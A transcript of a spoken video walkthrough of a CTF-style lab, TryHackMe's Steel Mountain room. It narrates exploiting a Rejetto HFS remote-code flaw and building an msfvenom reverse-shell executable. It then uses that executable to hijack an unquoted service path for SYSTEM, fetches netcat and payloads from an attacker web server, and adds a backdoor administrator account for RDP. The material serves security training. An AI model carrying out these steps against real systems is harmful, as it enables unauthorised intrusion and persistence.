Hey everybody, Seville here, and today we're going to be going over the Steel Mountain room in TryHackMe, which is a Mr.Robot themed Windows machine where we use Metasploit to do a little bit of exploitation and then eventually get privilege escalation through Metasploit, and then it allows us to do it manually to kind of go through the same steps, just of course manually. And I have to preface with the fact that I have recorded this video twice. In two separate days. I tried 2 days ago at like 1 in the morning to record this, and it just did not go well. It was way too late for me. I really needed to get some sleep for work the next day. And then I tried last night, and it also did not go well for me. And I ended up completing the box, and I completed the recording last night, but it was a very, uh, it just wasn't a great performance. It wasn't really worth wasting your time with how much was there and how much wasn't there. And I have to blame the lack of sleep and the very tired eyes I possessed at the time of making the video. So today I'm actually going to make it at a reasonable time. Yesterday I think was actually around like 2 a.m. I tried to record this video. So I got a little bit of sleep and now we're ready to get back to it. So let's go ahead and not waste any more of your time by explaining that and jump right into it. So I've already deployed the box, as you can see, and as you can see as well, I've already completed this box, so this is just a very true walkthrough, and obviously I'm going to know most of what's going on. So let's go ahead and start with task one, and that is the introduction. And it says, in this room, you will enumerate a Windows machine, gain initial access with Metasploit, use PowerShell to further enumerate the machine, and escalate your privileges to administrator. And just goes on to tell us that we can have our own Kali room, and then to note that it does not respond to ping requests, and it may take a few minutes to boot up. This is why I went ahead and just deployed it a little bit early. So let's go ahead and get into question one, and it is to deploy the machine and answer who is the employee of the month. And we can do that by just going to the IP address that we have here for the machine. And as we see, it is actually right there for us, the employee of the month. However, we don't know his name. The way I got that was just going to the page source and looking at the name of the image, which is Bill Harper. And from the show, Mr.Robot, if you know, Bill Harper got got grilled a little bit by Elliot so that he could go on with the hack of Steel Mountain. So really interesting, really fun, especially if you watch the show. You know him from the show, not very much. I think he's only in one episode. So, but cool anyways. So that completes the task one, and we move on to task two here, where it asks us to scan the machine with Nmap. What is the other port running a web server on? And I already have Nmap set up, so I can actually just open up a terminal, and we can cat out that Nmap file that I saved. Let's go to Steel Mountain, and I should have it here, and I do, and we can cat that out. And we see we have a few ports, and the answer that we're looking for, obviously, is our other web server, which is on port 8080, and it's an HTTP file server. And then we just have like 3389, we have 445, 139, 135, and a few RPC ports open. And that's really all that, that's really all that there is for us. And we obviously see that the answer is in fact going to be 8080 because that is where our web server is. And then it asks us to take a look at the other web server, what file server is running. So we can head over to port 8080. And we see that it is an HTTP file server. We kind of already knew that when we ran our Nmap scan with the SV flag for enumerate the versions of the port. And it actually needs the Rigetto, I hope I'm saying that right, the Rigetto at the front of that, because it isn't a Rigetto HTTP file server. You would know that if you click the hyperlink, and you would see that you're on rigetto.com. So that was in fact the answer there. And then it asked for the CVE number that exploits this file server. I did just a really basic search. I just did Rigetto HTTP file server CVE, and that really just gives you something very easy. I saw Rapid7, so I went to that because I knew I was going to be using Metasploit, so I assumed that not only would I be getting the CVE, but I'd also be getting the exploit to use in Metasploit. And as you can see, 2014-6287 is the CVE, and that is in fact the exploit that we would be using. And then it says to use the Metasploit to get an initial shell. What is the user flag? So let's go ahead and go through that. We'll go ahead and start Metasploit up. Shouldn't take too long here. And while we get that going, I'm going to go ahead and head over to this real quick and just copy this so I don't have to type it out and waste some time there. And I accidentally used the wrong key there. There we go. Still not up. That's okay. And as you can see, it's a pretty straightforward exploit. We just load it, set the R host, the R port, and then we can just exploit from right there. And it's good to go. We drop into a MetaSploit shell where we can then get user.txt. We can look around the box for a little bit, but task 3 really brings us to where we need to go and what we need to do to move on to privilege escalation. So let's see if that's loaded, and it is. We will use. Well, why didn't it copy my exploit there? That's weird. All right, I should have a copy now. And I do, and we can just show options, and you can just see everything's as it is, and we can just change the R host to, what is that IP address? It's 10.10.46.83, and then set our port to 8080, because that is where the file server is located, and we can go ahead and exploit. And it'll give a little bit of output, and then we should drop right into a MetaSploit shell. All right, there we are, and then we can just do a, we just do a dir and find out that we are in Bill's user folder. We're pretty deep in the user folder. Nonetheless, we know that we are in fact in Bill's user folder. So we could just cdc users Bill desktop and see user.txt is right there for us, and then we can cat user.txt. And we get the user flag. So that would be our last and final answer for task 2, where we can move on to privilege escalation. And with privilege escalation, it says now that you have an initial shell on this Windows machine as Bill, we can further enumerate the machine and escalate our privileges to root. To enumerate this machine, we will use a PowerShell script called PowerUp. This always gets me. Right here is where I messed up on each of the videos, and I tried so hard not to start, but I almost did. The purpose is to evaluate a Windows machine and determine any abnormalities. PowerUp aims to be a clearinghouse of common Windows privilege escalation vectors that rely on misconfigurations. And it gives you a great hyperlink here so you can download PowerUp if you don't already have it, and it tells you how to upload it and then get into your PowerShell shell and then invoke the checks that PowerUp goes through to go ahead and give you the answers that you need. So with that, we can go ahead and follow along exactly with that. Our directory is a little bit different than the one that they show here, but nonetheless it is correct. You want to upload from the directory of which you have powerup.ps1. So let's go ahead and do that for ourselves. We want to go ahead and do the upload command, and it is in, I believe it is in PowerSploit, privesc, and then PowerUp. And then once you upload powerup.ps1, we can go ahead and load PowerShell. Shouldn't take too long. And once that loads, we can then go into a PowerShell shell, and we should be able to invoke the PowerUp command so that it runs through its enumeration, basically. So PowerShell shell. And as you can see by the PS that we are now in a PowerShell shell, and we can go ahead and get PowerUp going, and then invoke all checks. And if you didn't know that, all you really need to do is just follow this right here. It's pretty straightforward. As you can see, no answer is needed. It just kind of tells you and guides you on what you need to do. So pretty easy. And we'll wait for that to run, and it actually didn't take very long at all. And as you can see, the output is it's pretty thin. It doesn't give much information except for that's right here. And we can move on to task 2 because we went ahead and invoked the checks, and it's ran, and we can, you know, we're done with that. So it says take close attention to the can restart option that is set to true. What is the name of the unquoted service path service name? Well, there's two parts to that as far as, you know, the output goes. You can either find it here. I happen to just go here, and I just thought this was the only output that was worth anything. But I noticed that, you know, there's a few other can restarts, but it's actually the same thing kind of. However, I just kind of worked off this and didn't even pay any mind to this until last night when I was recording the video, and realized that I could have, you know, used this as well. But nonetheless, we get the service name of the. This is the only one that we can restart. This can restart option means that we can restart the service. I apologize for kind of just running off with that. So we can restart the service. We can restart advanced system compare service 9. We know that we can modify it because we are in the machine as Bill. So that's perfect. And we see the path to the file. So all things great. So now we know that we can restart the service. We can modify it. So we can build something malicious, copy this file name, replace it, and then load our malicious program, and then do, you know, whatever we need, which we will be doing. So the can restart option being true allows us to restart a service on the system, as you already know. The directory to the application is also writable, as you should also already know. This means we can replace the legitimate application with our malicious one, restart the service, which will run our infected program. So that pretty much sums it up. So we're going to be using MSF Venom to generate a reverse shell as a Windows executable. TryHackMe is so kind as to kind of let you know how to do that. If you didn't, I'm sure there are, or I'm not sure that there are, but there are in fact MS Venom cheat sheets that you could go to. I'm sure I've actually used this one plenty of times. This one's really good, but for the purpose of this machine specifically, this will work just fine. So all we would need to do is basically just follow this, and we'd be good to go. However, there are a few things that we need to do before that. So for one, when we upload this, and, you know, we set the L host and the L port to our local host and our desired port, you know, we encode it, all that great stuff, we are going to need something listening out for the call out to our local host in order for us to get the shell. So what we can do is go back to this, and we can actually exit. Oops, did I get out of that? Yes. So we can actually terminate this shell by just doing a Control C, doing Y, and we're back in our MeterPreter here, and I can actually background this MeterPreter session, and that, you know, now it's backgrounding a session 1, and I can clear. And in order for us to get a listener set up, we can use exploit multi-handler. As you can see, it doesn't come with much of anything. We need to go ahead and set the payload to a Windows shell reverse TCP. I don't know why it gave me a little spike there. I was wondering if it had failed on me, but luckily it did not. And now when you do show options, we should see a little bit more to go off of. So now we have our listening host and our listening port that we can modify for ourselves. I actually don't know the IP address that I was given. 10.8.13.197. So we can go ahead and set our L host to 10.8.13.197 and set our L port to, for the purpose of this now, I'm just going to go ahead and use the 4443, which is the port that they have here in the TryHackMe example right under this terminal here. So now that that's done and finished, we can show options again. If you want to, just do a quality check and see that we have the payload set to a reverse TCP, which is what we want. We have our L host set up to our local host and the L port of our choosing. Preferably one that isn't already running on the machine, obviously, because then that wouldn't do us much of any use. So we can go ahead and do an exploit -J, and now we can go into sessions -I in order to get to the session, and then 1 because that was the session that we backgrounded that had the meter preater. So we can go ahead and do that, and we can begin interacting with that. Now we can go and get MSF Venom to generate a program that we are going to basically copy over into the path of the service Advanced System Care Service 9 in order to exploit it. So in order to do that, to make it a little bit easier on myself, I know from here that I am in the Steel Mountain directory in my TryHackMe parent directory of that. So it's probably best for me to just go ahead and go there, build my my malicious program, and then we can upload it straight from there. So let's go ahead and do that. We'll go ahead and cd to TryHackMe directory and then to Steel Mountain. And now we basically just run the MSF Venom command. So MSF Venom -P for, I believe that's platform. And we do Windows shell reverse TCP. Then lhost going to be obviously our local host, so 10.8.13.197. Lport is going to be 4443. Then we want to encode it with the flag -E. We're going to use x86. I hope I'm saying this right. Shikata Ganai. Doesn't need to be capital. -F for executable. And then how we want to output that, and it is going to be, so in the screenshot actually it says advanced.exe. That is actually not the output that we want. We want to use the output that the path had before. So I don't know if we still have it up. Let's see. Let me see where I'm at. We are in Bill's desktop, so we can actually go over to C real quick. Oops, wrong command. CD. Perfect. So we're here. Let's go into program files. It's got to be x86. I do remember that much. Making sure I don't type anything crazy. IO bit. And we could just upload it right here. This would be the perfect spot because we actually need to put it into the Advanced System Care directory to replace ASC service.exe, which is the path from that service earlier when we ran the invoke checks here. So let's go ahead and do that. So we can go ahead and make the output to ASC service. I keep on wanting to say ASCS, but I know it's ASC service.exe. And if we hit enter, it should go ahead and compile that and build it out for us. Doesn't take long, and as you can see now, we have our malicious program. So let's go ahead and jump over here, and we can upload ASC service.exe. And as you can see, it is now sitting on the sitting in the directory of IOBit on the target machine. So now all we need to do is stop the service, copy over the ASC service.exe malicious program into the Advanced System Care directory, overriding the current ASC, the non-malicious ASC service.exe, then restart the service, and we should get a callback to our multi-handler that's running also. So let's go ahead and go to our PowerShell. Actually, what we would want to do in order to make this a little bit easier, we should just go to shell. And now we're in a shell, we can sc stop. That is just going to stop the service. And if you don't remember the service name, this is our service name. So perfect. Advanced System Care Service 9. Now when you run this command, this is just going to stop the service, allowing us to modify the path. As you can see, that command went by successfully, and we can, since this is Windows, I'm pretty sure it's copy asc service.exe. We want to copy that over to advanced system care directory. That should ask us if we want to overwrite what's already in there, and as you can see, we know that that file is in there because it's asking us to overwrite it. Obviously, we would want to overwrite it so that we can get the malicious program to take its place and run. So yes. And we see that one file was copied over, which is our file. And now we can sc start advanced system care service. I had a little brain fart there, a little brain freeze. Didn't remember what it was. And basically now what we're doing is we are now starting the service back up so that it will run our malicious program and call out to our listener on the other side. So when we hit enter, we'll see that command shell session 2 has opened. And let's see if we can go ahead and I wonder if I can actually just hop over to that. Okay, I can't. No problem. We'll terminate this shell right here. We'll go session. Oh, I may have actually could have done that because I dropped that last S on session. So sessions dash I and then 2 because we can see that the command shell session 2 opened. With a different session. Let's see sessions. Let's see what oh, actually need to get out of this. So background. I was still in the session 1, so I couldn't flop over. So if we do sessions, we see that we have 2 now. We have our meter preater, and we have a new shell that we just spawned by restarting the advanced system care service after we copied over our malicious program. So let's go ahead and hop into sessions 2. It's going to start that interaction there. We should eventually get into this box. I don't know why it is taking its time here. Let's see, who am I? Yes. I don't know what that was. Okay, well, who am I? And we see that we are now the system user. So we can go to cd, c, users, administrators, desktop. Uh-oh. This way. There's administrators. Oh, I did administrators. It's just one. There's just one. There's just one. So users, administrator, desktop. That should get me there. We can path that out, and we see that we have root.txt. So now we can go ahead and drop that into our block here for the answer, and as you can see, that is correct. So now we can move on to task 4, which is basically redoing all those steps just manually. So let's go ahead and read this out. It's now let's complete the room without the use of Metasploit. For this, we will utilize PowerShell and WinPs to enumerate the system and collect the relevant information to escalate to. So with that being said, let's go ahead and let's exit. We will sessions dash K, capital K. What that does is basically just kills all the sessions that we have. As you can see, killing all sessions. And then we can go ahead and exit this, clear that out, and let's go ahead and get ready for the first part of task 4. So to begin, we shall be using the same CVE. However, this time, let's use this exploit. We'll go ahead and open that in a new tab. I apologize there. I'm going to get a quick sip of water here because my throat is getting dry. Okay, sorry about that. All right, and it looks here, it says, note that you will need to have a web server and a netcat listener active at the same time in order for this to work, which is extremely important to read here because without this, the exploit will not work. So to begin, you will need a netcat static binary on your web server. If you do not have one, you can download it from GitHub, and I'm pretty sure I deleted it. So we'll go ahead and open it and get that once more. You will need to run the exploit twice. The first time will pull our netcat binary to the system, and the second will execute our payload to gain a callback. So that's worth noting as well, is that we need to call it once so that it pulls the static binary for netcat to the target machine, and then we need to run the exploit for a second time so that netcat is actually used to send a call out to our listener, which we will set up as well so that obviously we can connect to the machine. We're not running out of time, so that's perfect. Let's see here. So here is our exploit that we need to run, our Python exploit. And instead of just downloading that, we could also use searchsploit. And by doing that, we could do searchsploit Rigetto HTTP file server. And we know from here that this is going to be our exploit. We can, just go over to the exploit DB and we see it's 39161, and that is 39161. So we can copy, we are in the directory that we want to be, which is Steel Mountain, and we can copy user share exploit DB exploits Windows remote, and then I had to look down there, 39161. I had to move my hand over to the keypad there, and I can't see through my microphone, sadly. Darn X-ray vision, or the lack of X-ray vision. So we're going to go ahead and copy that over. We're not going to give it a name, so it'll just copy over as 39161.py. Oh, missing. Oh, well, we gotta wait. Let's see. Copy. Missing destination file. What are we missing here? Maybe I do have to give it a name. Let's see. We'll just call it. We'll call it Elliot.py. And as you can see, it copied over that 39161 file, .py file, and we can confirm that by doing this and seeing that it is in fact our exploit that we are looking for. Before we can move forward, we can just go ahead and read some of this if we wanted to. However, I already kind of know what's going to be happening, and it lets you know that you may need to run it multiple times for success, and you need to be using a web server hosting netcat. So we need to go ahead and set up that as well. It kind of just lets you know. And then here is the usage that we need to do. So it's Python, name of the exploit, and then target IP address, target port number. But before we can do that, we need to go ahead and edit this file because we need to put in our local IP address, which is still the same, 10.8.13.197. And we're going to go ahead and use, let's just use a different port this time, or it's going to just use 9001. All right, and then we can write and save that out. And let's go ahead and clear. And it said that we are going to need both a web server. We still need the static binary for netcat, and then we need to set up our netcat listener. Let's go ahead and download the netcat here. We're just going to save that file. Let's go ahead and move that. Is it in there? To nc.exe. And as you can see, we now have the static binary for netcat, so that is done. I believe we're almost ready to go. So now that we have all that, we're also going to need our Python web server real quick. So let's go ahead and run tmux. And what we can do is we can split it and split it once more. So we can put our simple HTTP server here, and you can do this one of two ways. You can do Python 2, which would just be, I believe it's -m. I haven't used it in a while. So HTTP server 80 to define the port that we want to use, and that should just set up a web server for us. Or you can use Python 3, which is Python 3, and then it's HTTP, or is it -m, HTTP server in 80, permission denied, sudo, and there you go. So you do it one of two ways. I'm just going to use the old-fashioned way, and we have that set up. So now, with our web server set up, we're also going to need our netcat listener. So we'll call netcat with the flags LV and P. Then we set it up. We set our exploit to run on the to our localhost of port 9001. Sorry, I got a little tongue tied there. All right, now that's set up. Now what we can do is we can begin our exploitation. So we have Elliot there. We need to do Python Elliot, and then the IP address 10.10.46.83.80.80. And then what we should see is when we hit enter here, we should see a pull from our HTTP web server here. And that what that's going to do is that's going to get netcat.exe. Then we need to run it a second time so that it actually uses our nc.exe file that we have here. So let's go ahead and hit enter once to get the pull. We see a 200, so we know it got it. Let's hit it a second time, and we should get a shell above. Maybe. There we go. I don't know why, but third time's a charm. So as you can see, we're back right where we were initially with Metasploit. This time just obviously manually. So we can cd c users bill. Oops, I forgot to go to the desktop as well. And we can bear out and see that user.txt and our powerup.ps1 is still there. But no worries. Who cares about cleaning up when you're just hacking stuff, right? Always good to clean up if you are doing hacking though. So we'll just leave that there though. No issues for right now. So now that we're in the machine, we could go ahead and complete all that out. And it tells us that we need to get winpeas.exe, winpeas to the system using PowerShell-C. Once we run winpeas, we see that it points us towards unquoted path. So we can see that it provides us with the name of the service it is also running. And then it asks a question, what PowerShell-C command could we run to manually find out the service name? Format is PowerShell-C and then command here. And as you can see, it's a get service, which is that's a pretty easy lookup. You could just do something like PowerShell, I don't know, service enumeration. I actually just knew it already, so I didn't. Oh yeah, there you go. So get service is going to be the first thing on here, and you could just go ahead and you could try that out. Actually, in our shell, you could PowerShell-C get service. Wonder if that. Yep, and you can see that it actually just spits out all that information. It gives us state. See state of the process, the name, and then the display name. Yeah. So perfect. Obviously that was our answer there, but we need to get winpeas over to the machine. So let's go ahead and get out of that. Let's just get a new tab just in case I get a little wacky with all the splitting and stuff. So let's go to THM, Steel Mountain. Okay, so we need to get winpeas from our local host to the target machine. We still have our web server up. So what we could do is we could copy over winpeas.exe over to our Steel Mountain directory, and then do a PowerShell-C to wget winpeas.exe. So let's go ahead and do that exactly. Matter of fact, I am actually going to use this, and we'll just do it from right here. So it's in. I know it's in here, and winpeas.exe is so deep down in this folder. I should probably change it. Let's see, winpeas. I'm sorry, I'm gonna have to ls through a little bit of this because I don't remember it exactly. cd winpeas. I know it's here, and then I think it's release. Perfect. So we want to move winpeas.exe to our Steel Mountain directory. So THM Steel Mountain. Oh, we don't want to move it. I'm sorry. We just want to copy it. I want to make a copy. That's all we want. Okay, so we can cd back to our cd. We can change directories back to our Steel Mountain directory. And we should see that we have winpeas there now. So what we can do is go to our shell that we have through our netcat listener, and we can PowerShell-C We need to do a wget to our HTTP server right here. So to our localhost, which is 10.8.13.197, and I'm just going to specify port 80, and we need to get winpeas.exe, and then close those quotations marks, do a -out file, and we want to save it as winpeas.exe, and that should do it for us. You should see, as you saw, we just got a call out. It's a good request, so when we list our directory, we see that we have winpeas.exe now. And I believe it doesn't ask for much more after that. Oh, it just says we can go ahead and call it. So we can go ahead and run winpeas. And I'll make it a little bit more visible for us here. And as you can see, it finished up pretty quickly. It didn't have a lot to run. And we'll just go straight to where we need to. Did I just pass it? I didn't. Okay. As you can see, it's like linenum for Windows, and what we are looking for is services information. As you can see, interesting services -non-Microsoft. Check if you can override some service binary or perform a DLL hijacking. Also check for uncoded paths. Gives us a little hyperlink to that. And right at the top is our Advanced System Care Service 9. Tells us that it's auto stopped, no quotes, and space detected. And if we go back to TryHackMe here, it says once we run winpeas, we see that it points us towards an unquoted pass, which is this right here, no quotes, space detected. We can see that it provides us with the name of the service it is also running. So again, Advanced System Care Service 9. And it says, now let's escalate administrator with our newfound knowledge, generate our payload using MSF Venom, and pull it to the system using PowerShell. So basically, we're just going to be doing that same process that we did from Metasploit, where we background the session, set up a multi-handler, then used MSF Venom to craft another malicious program for ASC service.exe, copy it over, run it, and then we should get a shell back as system. So let's go ahead and do that, but this time, obviously, a little bit more manual. So now we need to generate a payload using MSF Venom with our new, I'm going to use 9001 again, so just for time's sake, I'm going to go ahead and just copy this once more. So let's bring this back up a little bit, and I'm going to go ahead and head over to that other shell, the other window here. We'll clear it, and we'll go ahead and we're going to remove the current one, and we'll go ahead and just make a new one. So MSF, well, we have to because the old one had 4443, and I want to use something different. We're going to use, we'll be super original, and we'll use 9002. Since we already have 9001 with our current shell, we can't use that. So let's go ahead and get that started up. So literally the same command. This time the L port is just going to be 9001 instead of 4443. So -P for platform, Windows shell, reverse TCP, then lhost, lhot. I think it cares about that or how good looking I am. So 10.8.13.197, L port is as original as can be, 9002. We want to encode it with x86 Jikata Ganai. I hope I'm saying that right. And I capitalize the N again. And then -F as we want to save it as an executable. And we want the name to be ASC service.exe. And let's just look it over real quick. So we have MSF Venom. That is exactly the command we want to run. We have Windows shell reverse TCP. That's what we want. Our L host is correct at 10.8.13.197. The L port is 9002, the most original port that we could think of, and we're encoding it with the same encoder that we used before, and we are outputting it to the same file name as we did before because that is what the path is looking for. So we can go ahead and hit enter. Shouldn't take long. Get that going for us. And as you can see, it is ready to go. So we can jump back over And now we need to just go ahead and let's quit out of that. Now we just need to upload the ASC service.exe into the, we could upload it into the same directory and then make a PowerShell-C wget call out to get that malicious executable, and then copy it over to the same path, and you should be able to set up another netcat listener on the most original port in the world, 9002. Make the service restart, and should get a shell as system. So let's go ahead and give that a shot. We want to go to, where do we want to go? We want to go to program files. So cdc program files x86 IO bit, not a capital. And let's see if that takes us there. And the reason I just put that all in quotations is so I didn't just have to do program files alone. I probably should have done that earlier, but you know, it's gotta be difficult, or else there's no fun. So PowerShell. So now that we're in the directory that we were in before with our MetaSploit shell, when we uploaded it, we're just in the same place. If we go there, we see that the old one is still there. We can actually, I believe it's DEL for Windows, ASC service. We want to just go ahead and delete this one. You can see that's gone. And now we can do PowerShell-C wget HTTP. Pretty much the same command that we use for WinPs. This time we're just going to get the ASC service.exe. So 10.8.13.197 port 80, and then we want the ASC service.exe, and we can close that out. The out file is going to be ASC service.exe, and we'll go ahead and hit enter. And you can see it made a good call out to our web server, and when we read out the directory, we see that it is now in place. And we can now copy, oh wait, not copy yet, we need to sc stop advanced system care service 9. You need to make sure that that's stopped. Service has not been started. So now what we can do is we can copy, and it's copy ASC service. I was just thinking if it was just CP, it probably is, watch. Now we just need to copy over our malicious program over into the directory of advanced system care, which is the path for the service that runs. And yes, we want to override it because now it's actually the old one is going to port that we're not looking for anymore. So let's go ahead and also, before we go just any further, I want to go ahead and set up our netcat listener on the most original port. I'm going to say that every time, the most original port. And we want to go ahead and overwrite. As you can see, one file was copied over, so we know that that was successful. And we want to sc start advanced system care service, one of the best services known to man. And we want to go ahead and start it. Once that's started, we can head over here, do a who am I, and we see that we are now into the authority system. So now we have root of the box manually, and we can go over straight to our administrators. Okay. I was reading off this. I just had switched over for the MSFN. It scared me for a moment. I thought I remembered all of this from my memory. I'm not that good. So now that we see that we've got our administrator shell, we could easily go over to our users folder, get the root flag, and input it in our task 3. However, we don't have to do that for task 4 because obviously we did it earlier with Metasploit, and we can just go ahead and hit complete because no answer was needed. And we've initially finished. Not initially, but we're finished. We are completely done. We have root of the box. I know that you can go on a little bit further. We could do something. We know that port 3389 is open for RDP, so we could do net user sevel, and we can make password. And yes, I know I've spelled password wrong. It's gotta be like that, or else it's not, it's not good. So let's go ahead and add a user to the machine. I'm gonna go ahead and net local group administrator administrators. Let's see, Seville add. So we went ahead and added ourselves to that. We created a user, obviously myself, Seville, and gave ourselves a wonderful, the most secure password known to man, password 123 exclamation point or bang. And we went ahead and added ourselves to the administrators group. So with that, what we could do is we can go over to a new window here and bring up Rimina. It's gonna ask for our root password because we're not privileged enough, and that should spawn this. Perfect. And it's a little big, so I'm gonna minimize that. Okay, or I'm not. I'm just gonna remaximize it. Just go to this corner here. Perfect. We want to set up a new connection, and the IP address is 10.10.46.83. So 10.10.46.83. It is. We know the username is Seville. The password is password 123 bang, and let's use client resolution so that you can kind of see it, and we'll go ahead and connect. We'll accept a certificate. We'll be kind enough to do such a thing. And it should connect us, as you can see it is, as the user that we just created, Seville. And as you can see, we are now on the server, which is a Windows Server 2012. And now we have basically a GUI now instead of just using the shell. We can go into Notepad and put our stamp of approval here. We hacked Steel Mountain. And that is it. I don't think there's anything further that we can do to this machine. And that is really all I have. If there is anything I may have missed, subscribe. I know I missed how to spell the right button, the right word. And I don't think I have much left. So I certainly appreciate everybody watching. If you enjoyed this video, please subscribe. If you have any information for me of something I maybe could have done differently, or maybe I missed, or anything for that matter, that might help me out, go ahead and leave a comment for me, and I'll be happy to learn something new or catch something I missed. And I certainly appreciate you all, and I hope you all have a great day. Goodbye.